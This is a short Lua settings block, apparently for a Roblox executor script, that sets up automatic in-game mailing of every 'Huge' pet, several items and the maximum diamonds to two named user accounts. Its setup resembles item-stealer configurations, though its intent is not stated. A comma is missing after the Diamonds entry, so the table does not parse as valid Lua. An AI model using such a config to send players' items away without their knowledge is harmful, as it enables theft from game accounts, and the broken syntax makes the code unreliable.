getgenv().Settings = {
    Mailing = {
        ["All Huges"] = {Class = "Pet", Amount =  "Max", AllTypes = true},
        ["Graffiti Gift"] = {Class = "Misc", Amount =  "Max"},
        ["Mini Chest"] = {Class = "Misc", Amount = "Max"},
        ["Diamonds"] = {Class = "Currency", Amount =  "Max"}
        ["Rainbow Huge Cat"] = {Class = "Pet", Amount = "Max"}
    },
    Users = {
        "Jellan545",
        "Dream568_5",
    },
    ["Split Items Evenly"] = true, --// False -> it will send the Amount per account.
    ["Only Online Accounts"] = true,
    }
